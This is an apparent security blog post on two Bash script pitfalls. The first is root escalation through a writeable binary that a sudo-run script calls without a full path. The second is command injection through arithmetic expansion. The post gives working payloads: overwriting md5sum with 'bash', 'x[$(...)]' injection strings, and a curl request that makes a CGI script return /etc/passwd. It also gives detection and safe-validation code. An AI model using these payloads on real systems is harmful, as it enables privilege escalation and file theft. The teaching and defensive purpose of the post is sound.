Interesting Bash Script Pitfalls

Two interesting vulnerabilities related to Bash scripts and related technologies: using binaries without specifying the full path, and arithmetic expansion abuse.

  1. Today, I would like to blog about two interesting pitfalls when using Bash scripts, which can lead to initial access or privilege escalation!
  2. The first pitfall is using binaries without specifying the full path.
    1. This becomes exploitable if any of the binaries used by the script (or the directory it is resolved from) is writeable by unprivileged users.
    2. To be honest, it is the Linux PATH abuse privilege escalation technique, just from a different perspective.
  3. The second pitfall I would like to discuss is arithmetic expansion abuse. It occurs because of how bash evaluates arithmetic: in an arithmetic context, an operand of the form name[...] is treated as an array reference, and the subscript is expanded, including any $(...) command substitution it contains.
  4. Bash scripts can be used for privilege escalation and initial access if
    1. The script is executed as a shell script by an account more privileged than ours.
    2. Sudo allows us to run certain shell scripts.
    3. A CGI script is being run on a web server.

Writeable Binaries in PATH

Detection

  1. A good way to detect this is to check every directory in PATH for writeable binaries. By default there should not be any, unless you are root. A writeable directory in PATH is just as dangerous, since we can drop our own binary there in front of the real one.
for d in $(echo "$PATH" | tr ':' '\n'); do find "$d" -type f -writable 2>/dev/null; done
  2. Actually, it is not 100% fool-proof, because sudo does not use our PATH: with env_reset it substitutes the secure_path from its Defaults (visible in the output below), so the directories to audit are the ones listed there. Double check with sudo -l
$ sudo -l
Matching Defaults entries for demo on 700109a60338:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User demo may run the following commands on 700109a60338:
    (ALL : ALL) /tmp/md5files.sh

Privilege Escalation

  1. Say we have a script like this
#!/bin/bash

md5sum /etc/hosts
  • When run, this script just calculates the MD5 hash of /etc/hosts. Note that md5sum is invoked by bare name, so bash resolves it through PATH (under sudo, through secure_path) at run time.
  2. Our user can run this script with sudo
$ sudo -l
[sudo] password for demo: 
Matching Defaults entries for demo on 700109a60338:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User demo may run the following commands on 700109a60338:
    (ALL : ALL) /tmp/md5files.sh
  3. Let's check whether md5sum in /usr/bin is writeable
$ find /usr/bin -type f -writable
/usr/bin/md5sum
  4. We can easily overwrite it like this. The file keeps its execute bit, so when the script calls md5sum, bash tries to execute it; since the file is no longer a valid binary, bash falls back to running it as a shell script, and that script consists of the single command bash.
echo "bash" > /usr/bin/md5sum
  5. To escalate privileges, run the script through sudo; the root-owned process executes our replacement md5sum and hands us a root shell
$ sudo /tmp/md5files.sh
root@700109a60338:/tmp# 
  • We are root!
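As an added example (not code from the original post), the following bash script bundles the checks from this section into reusable functions: it scans a PATH-style directory list for writeable directories and files, pulls secure_path out of captured sudo -l output (since that, not our own PATH, is what a sudo-run script resolves commands against), and lists the commands a script invokes by bare name. The sudo -l text and the md5files.sh contents in main are constructed samples modelled on the ones above; the function names are my own.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): audit helpers for the
# "binary without full path" pitfall. Sample inputs in main are constructed.

# Print "DIR  <path>" for each writeable directory in a colon-separated list
# and "FILE <path>" for each writeable regular file directly inside it.
# Entries that do not exist are skipped.
writable_in_path() {
  printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
    [ -n "$d" ] && [ -d "$d" ] || continue
    [ -w "$d" ] && printf 'DIR  %s\n' "$d"
    find "$d" -maxdepth 1 -type f -writable 2>/dev/null | sed 's/^/FILE /'
  done
}

# Extract secure_path from `sudo -l` output passed in as text. sudo prints
# the colons escaped as '\:'; undo that. Falls back to the caller's PATH
# when no secure_path is set, which is what sudo itself does in that case.
secure_path_from_sudo_l() {
  local sp
  sp=$(printf '%s\n' "$1" | sed -n 's/.*secure_path=\([^ ,]*\).*/\1/p' \
         | head -n 1 | sed 's/\\:/:/g')
  printf '%s\n' "${sp:-$PATH}"
}

# List, one per line, the commands a script runs without a path component.
# Heuristic: the first word of each non-blank, non-comment line, minus shell
# keywords, assignments and a few common builtins. Good enough to triage a
# sudo-able script; it is not a shell parser.
bare_commands() {
  grep -vE '^[[:space:]]*(#|$)' "$1" \
    | awk '{ print $1 }' \
    | grep -vE '^([A-Za-z_][A-Za-z0-9_]*=|if$|then$|else$|elif$|fi$|do$|done$|while$|until$|for$|case$|esac$|\{$|\}$|\[\[?$|echo$|printf$|read$|exit$|return$|local$|export$|cd$|set$|shift$)' \
    | grep -v '/' | sort -u
}

main() {
  local sudo_l sp tmp
  # Constructed sample modelled on the sudo -l output above.
  sudo_l='Matching Defaults entries for demo on 700109a60338:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty'
  sp=$(secure_path_from_sudo_l "$sudo_l")
  echo "secure_path: $sp"

  # Constructed scenario: a PATH with one writeable directory holding a
  # writeable md5sum, and a sudo-able script that calls md5sum by bare name.
  tmp=$(mktemp -d)
  mkdir "$tmp/bin"
  printf '#!/bin/sh\necho not-really-md5sum\n' > "$tmp/bin/md5sum"
  chmod 755 "$tmp/bin/md5sum"
  printf '#!/bin/bash\n\nmd5sum /etc/hosts\n/usr/bin/sha256sum /etc/hosts\nOUT=x\n' > "$tmp/md5files.sh"

  echo "writeable entries:"
  writable_in_path "$tmp/bin:/nonexistent"
  echo "bare commands in md5files.sh:"
  bare_commands "$tmp/md5files.sh"
  rm -rf "$tmp"
}
main
```

On a real box, run writable_in_path "$(secure_path_from_sudo_l "$(sudo -l)")" and bare_commands over each script sudo -l lets you run; every bare command that resolves to a writeable file, or is looked up through a writeable directory, is a candidate for the overwrite shown above. bare_commands only looks at the first word of each line, so it misses commands behind pipes or inside $(...) and may report builtins it does not know about.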

Arithmetic Expansion

  1. Arithmetic expansion occurs when
    1. We compare a variable with a number inside [[ ]] using an arithmetic operator such as -eq, -ne, -lt or -gt
    2. We declare a variable as an integer (declare -i / typeset -i) and then assign another value, such as user input, to it
  2. The vulnerability occurs because of how bash handles array references in arithmetic. An operand such as x[...] is treated as an element of an indexed array, and the subscript inside the square brackets is expanded before it is evaluated, so any $(...) command substitution in there gets executed. The same evaluation happens in (( )), $(( )) and let, so those are exposed in the same way, while the POSIX [ / test builtin is not: it requires real integers for -eq and simply fails on anything else.

Compare a variable with a number in [[]]

  1. This code is used to compare the input against a number.
#!/bin/bash

if [[ $1 -eq 0 ]]; then
    echo PASS;
else 
    echo FAIL;
fi

OR

#!/bin/bash

if [[ "$1" -eq 0 ]]; then
    echo PASS;
else 
    echo FAIL;
fi

Both of them are vulnerable to arithmetic expansion abuse.
  2. To abuse it, pass an array-style argument whose subscript contains a command substitution. The command's output is sent to stderr so that the subscript itself stays empty (which evaluates to index 0) and the comparison still passes:
./test.sh 'x[$(whoami >&2)]'

Output:

kali
PASS
  3. Another example: bash as a CGI script
#!/bin/bash
printf "Content-type: text\n\n"
read PARAMS                 # one line of the POST body, e.g. num=100
NUM="${PARAMS#num=}"        # strip the "num=" prefix; no validation of what is left
if [[ "$NUM" -eq 100 ]];then
  echo "OK"
else
  echo "NG"
fi

Can be easily exploited with

$ curl -d num='x[$(cat /etc/passwd > /proc/$$/fd/1)]' http://localhost/index.cgi
  • /proc/$$/fd/1 is the CGI script's own standard output, i.e. the HTTP response body, so the contents of /etc/passwd come back to us in the response. $$ sits inside single quotes, so it is expanded by bash on the server, not by our local shell.

Declare a variable as number, then assign another variable to this variable

  1. Example
#!/bin/bash
typeset -i b   # declare "b" as integer type ("typeset" is the same as "declare")
a=5
b="$1"         # with the integer attribute, the right-hand side is evaluated as arithmetic
echo "$a"
  2. To exploit it,
./setEnv.sh 'x[$(id >&2)]'
uid=1000(kali) gid=1000(kali) groups=1000(kali)
5
  3. In addition, we can also modify environment/bash variables, because an assignment inside the arithmetic expression takes effect as a side effect of evaluating it.
./setEnv.sh a=10
10
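As an added example covering both triggers in this section, the [[ -eq ]] comparison and the integer-typed assignment (this is not code from the original post), the script below puts each vulnerable pattern next to a check that never hands untrusted input to the arithmetic evaluator. The payload creates a marker file instead of writing to stderr, so whether the command substitution ran can be verified by looking for the file. Function names and the marker path are my own.

```bash
#!/usr/bin/env bash
# Added example (not from the original post). Vulnerable vs. safe handling
# of a number that comes from an untrusted caller. All inputs are constructed.

# Vulnerable: [[ -eq ]] evaluates both operands as arithmetic, so an argument
# like 'x[$(cmd)]' runs cmd while the array subscript is expanded.
check_vuln() {
  if [[ $1 -eq 0 ]]; then echo PASS; else echo FAIL; fi
}

# Safe: accept only an optional sign plus digits before any arithmetic sees
# the value. =~ is a string/regex match, not an arithmetic context.
check_safe() {
  local re='^-?[0-9]+$'
  if [[ $1 =~ $re ]] && [[ $1 -eq 0 ]]; then echo PASS; else echo FAIL; fi
}

# Also safe, and POSIX: the [ / test builtin does no arithmetic. -eq
# requires integer operands and fails with "integer expression expected"
# otherwise, so the payload is never evaluated.
check_test() {
  if [ "$1" -eq 0 ] 2>/dev/null; then echo PASS; else echo FAIL; fi
}

# Vulnerable: with the integer attribute every assignment is an arithmetic
# evaluation. A subscript payload runs its $(...), and an input such as
# 'a=10' is an arithmetic assignment that overwrites a.
int_assign_vuln() {
  local -i b
  local a=5
  b=$1
  echo "$a"
}

# Safe: validate the shape first; only then give the value an integer context.
int_assign_safe() {
  local re='^-?[0-9]+$'
  [[ $1 =~ $re ]] || { echo "rejected: $1" >&2; return 1; }
  local -i b
  local a=5
  b=$1
  echo "$a"
}

# Demo: a payload that creates a marker file when it is evaluated
# (constructed; the marker path comes from mktemp -u).
demo() {
  local marker payload
  marker=$(mktemp -u)
  payload='x[$(touch '"$marker"')]'
  echo "check_vuln      -> $(check_vuln "$payload"), marker created: $([ -e "$marker" ] && echo yes || echo no)"
  rm -f "$marker"
  echo "check_safe      -> $(check_safe "$payload"), marker created: $([ -e "$marker" ] && echo yes || echo no)"
  echo "check_test      -> $(check_test "$payload"), marker created: $([ -e "$marker" ] && echo yes || echo no)"
  echo "int_assign_vuln a=10 -> $(int_assign_vuln 'a=10')"
  echo "int_assign_safe a=10 -> $(int_assign_safe 'a=10' 2>&1)"
  rm -f "$marker"
}
demo
```

check_safe and int_assign_safe validate the shape of the value with a regex match before any arithmetic; =~ is a string operation, so the payload is never evaluated. check_test shows that the POSIX [ builtin is safe here by construction, because -eq rejects non-integers with an error instead of evaluating them. Treat bash's arithmetic evaluator like eval: anything that reaches it must already be known to be a number.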

Reference

  1. https://dev.to/greymd/eq-can-be-critically-vulnerable-338m
  2. https://mywiki.wooledge.org/BashPitfalls
  3. https://www.nccgroup.com/research/shell-arithmetic-expansion-and-evaluation-abuse
  4. https://unix.stackexchange.com/questions/172103/security-implications-of-using-unsanitized-data-in-shell-arithmetic-evaluation
Licensed under CC BY-NC-SA 4.0